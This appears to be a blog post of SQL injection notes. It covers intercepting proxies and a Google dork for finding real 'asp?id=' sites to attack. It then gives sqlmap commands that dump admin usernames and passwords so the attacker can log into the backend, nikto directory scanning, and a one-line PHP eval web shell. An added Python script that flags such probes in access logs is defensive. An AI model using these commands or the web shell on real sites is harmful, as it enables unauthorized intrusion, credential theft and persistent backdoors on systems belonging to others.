sqlmap usage and brute-force notes

#Intercepting proxy tools
mitmproxy -p 8800 #Start the proxy listening on port 8800

owasp-zap (Zed Attack Proxy, ZAP) is a comprehensive penetration testing toolkit for finding web application vulnerabilities. It includes an intercepting proxy, automated scanning, passive scanning, brute forcing, port scanning and a spider.

Burp Suite is an integrated platform for attacking web applications.
Burp Suite comes with a proxy that listens on port 8080 by default. Point the browser at this proxy.

proxyStrike v2.1 proxy tool

WebScarab is proxy software that includes an HTTP proxy, web crawler/spider, session ID analysis, a scripting interface, a fuzz testing tool, web format encoding/decoding, and WSDL (Web Services Description Language) and SOAP parsers, among other modules. WebScarab is released under the GNU license and is written in Java. It is one of the tools used with WebGoat.

Find test targets through google hack:
Search -> company inurl:asp?id=

1. Test the numeric injection point
2. Enumerate the database and table names with sqlmap
3. Dump table data
4. Log in to the admin backend

'
Read database version, current user, current database
sqlmap -u URL -f -b --current-db --current-user -v 1

sqlmap -u URL --tables #List tables that may be attacked

sqlmap -u URL -T uname --columns #List useful columns

sqlmap -u URL -T uname -C login_name,pass,username --dump #-C specifies the columns to retrieve, --dump dumps the table data

SQL injection of a PHP site:
1. Test the numeric injection point
2. Enumerate the database and table names with sqlmap
3. Dump table data
4. Use nikto to help find hidden directories
5. Use the hidden information in the web page code to find the management backend

sqlmap -u URL --dbs --current-user

sqlmap -u URL --dbs --dbms mysql -D cmxt --tables #cmxt is the database

sqlmap -u URL --dbs --dbms mysql --tables #Do not specify a database


sqlmap -u URL --dbs --dbms mysql -T admin --columns #View column results

sqlmap -u URL --dbs --dbms mysql -T admin -C user,pwd --dump #Query the value of a specific column

nikto -host DOMAIN #DOMAIN is the site's primary domain name; scans the site's directories and checks for known vulnerabilities.
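Seen from the server side, the sqlmap and nikto runs above leave traces in the web access log: the tools' default User-Agent strings, and a numeric `id` parameter carrying non-numeric, SQL-looking values. The following is an added example, not part of the original post, that flags both. It assumes combined-format access logs and that `id` is meant to be an integer; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
SAMPLE_LOG = '''\
203.0.113.5 - - [10/Jul/2023:10:00:01 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Jul/2023:10:00:02 +0000] "GET /news.php?id=12%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Jul/2023:10:00:03 +0000] "GET /news.php?id=12%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 500 310 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.7 - - [10/Jul/2023:10:00:04 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "Mozilla/5.00 (Nikto/2.5.0) (Evasions:None) (Test:000001)"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
SCANNER_UA = re.compile(r'\b(sqlmap|nikto)\b', re.I)   # default UAs; trivially changed by the client
NUMERIC_PARAMS = {"id"}   # assumption: parameters the application expects to be integers
SQL_TOKENS = re.compile(r"\b(union|select|and|or|sleep|benchmark|order\s+by)\b|--|'|/\*", re.I)

def classify(line):
    """Return the reasons a request looks like injection probing (empty list if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    reasons = []
    if SCANNER_UA.search(m["ua"]):
        reasons.append("scanner-user-agent")
    # parse_qsl URL-decodes values, so %20AND%201%3D1 is inspected as " AND 1=1".
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not value.isdigit():
            reasons.append(f"non-numeric:{name}")
            if SQL_TOKENS.search(value):
                reasons.append(f"sql-tokens:{name}")
    return reasons

def scan(log_text):
    """Map client IP -> sorted reasons across all of its flagged requests."""
    hits = {}
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            ip = line.split(" ", 1)[0]
            hits.setdefault(ip, set()).update(reasons)
    return {ip: sorted(r) for ip, r in hits.items()}

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

The third sample line carries a browser User-Agent and is still flagged, because the check on the numeric parameter does not depend on the client identifying itself.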

Fiddler: the AutoResponder returns the corresponding web page, to escalate privileges.

<?php eval($_POST[x]);?> One sentence password

Origin blog.csdn.net/davice_li/article/details/131792290